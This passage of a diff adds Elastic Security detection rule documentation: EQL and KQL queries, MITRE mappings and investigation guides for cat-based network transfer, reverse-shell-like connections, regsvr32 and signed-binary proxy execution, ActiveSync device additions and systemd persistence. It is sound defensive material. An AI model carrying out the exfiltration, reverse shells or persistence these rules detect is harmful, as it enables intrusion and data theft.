b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-activity-detected-via-cat.asciidoc @@ -0,0 +1,67 @@ +[[prebuilt-rule-8-10-5-network-activity-detected-via-cat]] +=== Network Activity Detected via cat + +This rule monitors for the execution of the cat command, followed by a connection attempt by the same process. Cat is capable of transfering data via tcp/udp channels by redirecting its read output to a /dev/tcp or /dev/udp channel. This activity is highly suspicious, and should be investigated. Attackers may leverage this capability to transfer tools or files to another host in the network or exfiltrate data while attempting to evade detection in the process. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Command and Control +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.entity_id with maxspan=1s + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and process.name == "cat" and + process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish")] + [network where host.os.type == "linux" and event.action in ("connection_attempted", "disconnect_received") and process.name == "cat" and + destination.ip != null and not cidrmatch(destination.ip, "127.0.0.0/8", "169.254.0.0/16", "224.0.0.0/4", "::1")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-connection-via-recently-compiled-executable.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-connection-via-recently-compiled-executable.asciidoc new file mode 100644 index 0000000000..1040e1894b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-connection-via-recently-compiled-executable.asciidoc @@ -0,0 +1,76 @@ +[[prebuilt-rule-8-10-5-network-connection-via-recently-compiled-executable]] +=== Network Connection via Recently Compiled Executable + +This rule monitors a sequence involving a program compilation event followed by its execution and a subsequent network connection event. This behavior can indicate the set up of a reverse tcp connection to a command-and-control server. Attackers may spawn reverse shells to establish persistence onto a target system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan=1m + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + process.name in ("gcc", "g++", "cc")] by process.args + [file where host.os.type == "linux" and event.action == "creation" and process.name == "ld"] by file.name + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start"] by process.name + [network where host.os.type == "linux" and event.action == "connection_attempted"] by process.name + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-connection-via-registration-utility.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-connection-via-registration-utility.asciidoc new file mode 100644 index 0000000000..b8335eb367 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-connection-via-registration-utility.asciidoc @@ -0,0 +1,150 @@ +[[prebuilt-rule-8-10-5-network-connection-via-registration-utility]] +=== Network Connection via Registration Utility + +Identifies the native Windows tools regsvr32.exe, regsvr64.exe, RegSvcs.exe, or RegAsm.exe making a network connection. This may be indicative of an attacker bypassing allowlists or running arbitrary scripts via a signed Microsoft binary. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Network Connection via Registration Utility + +By examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity such as masquerading, and deserve further investigation. + +This rule looks for the execution of `regsvr32.exe`, `RegAsm.exe`, or `RegSvcs.exe` utilities followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. + - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes. + - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware. +- Investigate the target host that the signed binary is communicating with. + - Check if the domain is newly registered or unexpected. + - Check the reputation of the domain or IP address. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + +### False positive analysis + +- If this activity is expected and noisy in your environment, consider adding exceptions — preferably with a combination of destination IP address and command line conditions. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id + [process where host.os.type == "windows" and event.type == "start" and + process.name : ("regsvr32.exe", "RegAsm.exe", "RegSvcs.exe") and + not ( + (?process.Ext.token.integrity_level_name : "System" or ?winlog.event_data.IntegrityLevel : "System") and + (process.parent.name : "msiexec.exe" or process.parent.executable : ("C:\\Program Files (x86)\\*.exe", "C:\\Program Files\\*.exe")) + ) + ] + [network where host.os.type == "windows" and process.name : ("regsvr32.exe", "RegAsm.exe", "RegSvcs.exe") and + not cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", + "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", + "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24", "192.168.0.0/16", "192.88.99.0/24", "224.0.0.0/4", + "100.64.0.0/10", "192.175.48.0/24","198.18.0.0/15", "198.51.100.0/24", "203.0.113.0/24", "240.0.0.0/4", "::1", + "FE80::/10", "FF00::/8") and network.protocol != "dns"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Regsvcs/Regasm +** ID: T1218.009 +** Reference URL: https://attack.mitre.org/techniques/T1218/009/ +* Sub-technique: +** Name: Regsvr32 +** ID: T1218.010 +** Reference URL: https://attack.mitre.org/techniques/T1218/010/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-connection-via-signed-binary.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-connection-via-signed-binary.asciidoc new file mode 100644 index 0000000000..929f01fafb --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-connection-via-signed-binary.asciidoc @@ -0,0 +1,134 @@ +[[prebuilt-rule-8-10-5-network-connection-via-signed-binary]] +=== Network Connection via Signed Binary + +Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Adversaries may use these binaries to 'live off the land' and execute malicious files that could bypass application allowlists and signature validation. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Network Connection via Signed Binary + +By examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation. + +This rule looks for the execution of `expand.exe`, `extrac32.exe`, `ieexec.exe`, or `makecab.exe` utilities, followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities to bypass detections and evade defenses. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. + - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes. + - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware. +- Investigate the target host that the signed binary is communicating with. + - Check if the domain is newly registered or unexpected. + - Check the reputation of the domain or IP address. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + +### False positive analysis + +- If this activity is expected and noisy in your environment, consider adding exceptions — preferably with a combination of destination IP address and command line conditions. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id + [process where host.os.type == "windows" and (process.name : "expand.exe" or process.name : "extrac32.exe" or + process.name : "ieexec.exe" or process.name : "makecab.exe") and + event.type == "start"] + [network where host.os.type == "windows" and (process.name : "expand.exe" or process.name : "extrac32.exe" or + process.name : "ieexec.exe" or process.name : "makecab.exe") and + not cidrmatch(destination.ip, + "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.0.0/29", "192.0.0.8/32", + "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", "192.0.2.0/24", "192.31.196.0/24", + "192.52.193.0/24", "192.168.0.0/16", "192.88.99.0/24", "224.0.0.0/4", "100.64.0.0/10", "192.175.48.0/24", + "198.18.0.0/15", "198.51.100.0/24", "203.0.113.0/24", "240.0.0.0/4", "::1", "FE80::/10", "FF00::/8")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-new-activesyncalloweddeviceid-added-via-powershell.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-new-activesyncalloweddeviceid-added-via-powershell.asciidoc new file mode 100644 index 0000000000..0a7d0e8bf0 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-new-activesyncalloweddeviceid-added-via-powershell.asciidoc @@ -0,0 +1,92 @@ +[[prebuilt-rule-8-10-5-new-activesyncalloweddeviceid-added-via-powershell]] +=== New ActiveSyncAllowedDeviceID Added via PowerShell + +Identifies the use of the Exchange PowerShell cmdlet, Set-CASMailbox, to add a new ActiveSync allowed device. Adversaries may target user email to collect sensitive information. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ +* https://docs.microsoft.com/en-us/powershell/module/exchange/set-casmailbox?view=exchange-ps + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.name: ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and process.args : "Set-CASMailbox*ActiveSyncAllowedDeviceIDs*" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Email Delegate Permissions +** ID: T1098.002 +** Reference URL: https://attack.mitre.org/techniques/T1098/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-new-systemd-service-created-by-previously-unknown-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-new-systemd-service-created-by-previously-unknown-process.asciidoc new file mode 100644 index 0000000000..bdb2090b74 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-new-systemd-service-created-by-previously-unknown-process.asciidoc @@ -0,0 +1,94 @@ +[[prebuilt-rule-8-10-5-new-systemd-service-created-by-previously-unknown-process]] +=== New Systemd Service Created by Previously Unknown Process + +Systemd service files are configuration files in Linux systems used to define and manage system services. Malicious actors can leverage systemd service files to achieve persistence by creating or modifying service files to execute malicious commands or payloads during system startup. This allows them to maintain unauthorized access, execute additional malicious activities, or evade detection. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://opensource.com/article/20/7/systemd-timers +* https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Privilege Escalation +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:linux and event.category:file and event.action:("creation" or "file_create_event") and file.path:( + /etc/systemd/system/* or + /usr/local/lib/systemd/system/* or + /lib/systemd/system/* or + /usr/lib/systemd/system/* or + /home/*/.config/systemd/user/* +) and +not ( + process.name:( + "dpkg" or "dockerd" or "rpm" or "snapd" or "yum" or "exe" or "dnf" or "dnf-automatic" or python* or "puppetd" or + "elastic-agent" or "cinc-client" or "chef-client" or "pacman" or "puppet" or "cloudflared" + ) or + file.extension:("swp" or "swpx") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Sub-technique: +** Name: Systemd Service +** ID: T1543.002 +** Reference URL: https://attack.mitre.org/techniques/T1543/002/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Sub-technique: +** Name: Systemd Service +** ID: T1543.002 +** Reference URL: https://attack.mitre.org/techniques/T1543/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-new-systemd-timer-created.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-new-systemd-timer-created.asciidoc new file mode 100644 index 0000000000..a352cd620e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-new-systemd-timer-created.asciidoc @@ -0,0 +1,140 @@ +[[prebuilt-rule-8-10-5-new-systemd-timer-created]] +=== New Systemd Timer Created + +Detects the creation of a systemd timer within any of the default systemd timer directories. Systemd timers can be used by an attacker to gain persistence, by scheduling the execution of a command or script. Similarly to cron/at, systemd timers can be set up to execute on boot time, or on a specific point in time, which allows attackers to regain access in case the connection to the infected asset was lost. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://opensource.com/article/20/7/systemd-timers +* https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 6 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating New Systemd Timer Created + +Systemd timers are used for scheduling and automating recurring tasks or services on Linux systems. + +Attackers can leverage systemd timers to run scripts, commands, or malicious software at system boot or on a set time interval by creating a systemd timer and a corresponding systemd service file. + +This rule monitors the creation of new systemd timer files, potentially indicating the creation of a persistence mechanism. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. +> This investigation guide uses {security-guide}/security/current/osquery-placeholder-fields.html[placeholder fields] to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run. + +#### Possible Investigation Steps + +- Investigate the timer file that was created or modified. + - !{osquery{"label":"Osquery - Retrieve File Information","query":"SELECT * FROM file WHERE path = {{file.path}}"}} +- Investigate the currently enabled systemd timers through the following command `sudo systemctl list-timers`. +- Search for the systemd service file named similarly to the timer that was created. +- Investigate whether any other files in any of the available systemd directories have been altered through OSQuery. + - !{osquery{"label":"Osquery - Retrieve File Listing Information","query":"SELECT * FROM file WHERE (\npath LIKE '/etc/systemd/system/%' OR \npath LIKE '/usr/local/lib/systemd/system/%' OR \npath LIKE '/lib/systemd/system/%' OR\npath LIKE '/usr/lib/systemd/system/%' OR\npath LIKE '/home/user/.config/systemd/user/%'\n)\n"}} + - !{osquery{"label":"Osquery - Retrieve Additional File Listing Information","query":"SELECT\n f.path,\n u.username AS file_owner,\n g.groupname AS group_owner,\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\n datetime(f.btime, 'unixepoch') AS file_created_time,\n f.size AS size_bytes\nFROM\n file f\n LEFT JOIN users u ON f.uid = u.uid\n LEFT JOIN groups g ON f.gid = g.gid\nWHERE (\npath LIKE '/etc/systemd/system/%' OR \npath LIKE '/usr/local/lib/systemd/system/%' OR \npath LIKE '/lib/systemd/system/%' OR\npath LIKE '/usr/lib/systemd/system/%' OR\npath LIKE '/home/{{user.name}}/.config/systemd/user/%'\n)\n"}} +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations. + - !{osquery{"label":"Osquery - Retrieve Running Processes by User","query":"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username"}} +- Investigate other alerts associated with the user/host during the past 48 hours. +- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations. +- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. + - If scripts or executables were dropped, retrieve the files and determine if they are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - Check if the domain is newly registered or unexpected. + - Check the reputation of the domain or IP address. + - File access, modification, and creation activities. + - Cron jobs, services and other persistence mechanisms. + - !{osquery{"label":"Osquery - Retrieve Crontab Information","query":"SELECT * FROM crontab"}} + +### False Positive Analysis + +- If this activity is related to new benign software installation activity, consider adding exceptions — preferably with a combination of user and command line conditions. +- If this activity is related to a system administrator who uses systemd timers for administrative purposes, consider adding exceptions for this specific administrator user account. +- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Delete the service/timer or restore its original configuration. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type : "linux" and event.action : ("creation" or "file_create_event") and file.extension : "timer" and +file.path : (/etc/systemd/system/* or /usr/local/lib/systemd/system/* or /lib/systemd/system/* or +/usr/lib/systemd/system/* or /home/*/.config/systemd/user/*) and not process.name : ( + "docker" or "dockerd" or "dnf" or "yum" or "rpm" or "dpkg" or "executor" or "cloudflared" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Systemd Timers +** ID: T1053.006 +** Reference URL: https://attack.mitre.org/techniques/T1053/006/ diff --git 